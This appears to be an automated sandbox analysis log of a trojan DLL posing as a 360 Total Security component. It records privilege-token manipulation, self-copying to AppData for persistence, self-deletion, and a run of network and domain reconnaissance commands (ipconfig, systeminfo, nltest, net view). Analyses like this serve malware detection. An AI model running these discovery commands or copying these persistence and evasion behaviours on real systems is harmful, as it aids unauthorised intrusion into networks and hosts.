Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C79C8 NtClose, 4_2_00000203431C79C8
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 4_2_00000203431C463C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7A54 NtWriteFile, 4_2_00000203431C7A54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0AC0 NtFreeVirtualMemory, 4_2_00000203431D0AC0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7ACC NtClose, 4_2_00000203431C7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0AF0 NtWriteFile, 4_2_00000203431D0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7704 NtQueryInformationFile, 4_2_00000203431C7704
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CCB54 NtDelayExecution, 4_2_00000203431CCB54
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C745C RtlInitUnicodeString,NtOpenFile,NtClose, 4_2_00000203431C745C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0A78 NtClose, 4_2_00000203431D0A78
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7694 RtlInitUnicodeString,NtDeleteFile, 4_2_00000203431C7694
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431D0A90 NtDeleteFile, 4_2_00000203431D0A90
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013B1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 9_2_000002238013B1D4
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 9_2_000002238013463C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137A54 NtWriteFile, 9_2_0000022380137A54
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013B0C4 NtOpenKey,RtlpNtOpenKey, 9_2_000002238013B0C4
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013AD34 NtAllocateVirtualMemory, 9_2_000002238013AD34
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137B40 NtFreeVirtualMemory, 9_2_0000022380137B40
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013CB54 NtDelayExecution, 9_2_000002238013CB54
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013378C NtClose, 9_2_000002238013378C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801377B0 RtlInitUnicodeString,NtCreateFile, 9_2_00000223801377B0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801379C8 NtClose, 9_2_00000223801379C8
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013745C RtlInitUnicodeString,NtOpenFile,NtClose, 9_2_000002238013745C
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140A78 NtClose, 9_2_0000022380140A78
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137694 RtlInitUnicodeString,NtDeleteFile, 9_2_0000022380137694
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140A90 NtDeleteFile, 9_2_0000022380140A90
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380140AC0 NtFreeVirtualMemory, 9_2_0000022380140AC0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_00000223801378C0 NtReadFile, 9_2_00000223801378C0
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137ACC NtClose, 9_2_0000022380137ACC
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137704 NtQueryInformationFile, 9_2_0000022380137704
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380137588 RtlInitUnicodeString,NtCreateFile,NtClose, 9_2_0000022380137588
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A2C8: DeviceIoControl, 3_2_000000018006A2C8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180017FE8 3_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006DFF4 3_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800220D8 3_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007C140 3_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060174 3_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008023C 3_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000834C 3_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006C470 3_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800784E0 3_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800764F0 3_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180060578 3_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010580 3_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004E5DC 3_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062600 3_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180002610 3_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180004638 3_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 3_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E760 3_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800647B0 3_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007E7C7 3_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180076930 3_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062954 3_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006A994 3_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006E9FC 3_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180082A18 3_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180072A27 3_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010B58 3_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180026C84 3_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001ECF4 3_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180008E20 3_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180052FD8 3_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003AFE8 3_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005D014 3_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F0B4 3_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800630CC 3_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005912C 3_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007B2D0 3_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002B2EC 3_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006D3D4 3_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 3_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180075480 3_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800694A0 3_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005958C 3_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800576DC 3_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800097E0 3_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800277FC 3_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018002D964 3_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073B60 3_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007BBB0 3_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001BC38 3_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005DD18 3_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180073DF0 3_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180011DF0 3_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018005BE6C 3_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FF88 3_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1030 4_2_00000203431C1030
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131030 9_2_0000022380131030
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Source: classification engine Classification label: mal100.spre.troj.evad.winDLL@42/11@2/2
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess, 3_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z, 3_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle, 3_2_000000018008395A
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004B780 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,ProcessIdToSessionId,Process32NextW,CloseHandle,CloseHandle, 3_2_000000018004B780
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800072A8 CoCreateInstance, 3_2_00000001800072A8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003A8D4 LoadLibraryExW,FindResourceW,SizeofResource,LoadResource,LockResource,malloc,memmove,FreeResource,FreeLibrary,VerQueryValueW,free, 3_2_000000018003A8D4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5572
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\eddefae7-6eaa-4249-9c09-cb1fe09591eb
Source: 360total.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, Update_79066994.dll.4.dr Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5572 -s 472
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 360total.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 360total.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 360total.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Source: Update_79066994.dll.4.dr Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.dll Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.dll Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr Static PE information: section name: yhDm^
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018017500F push rdx; iretd 3_2_0000000180175010

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe File created: C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle, 3_2_0000000180049AEC

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\rundll32.exe File deleted: c:\users\user\desktop\360total.dll.dll
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_0000000180062148
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
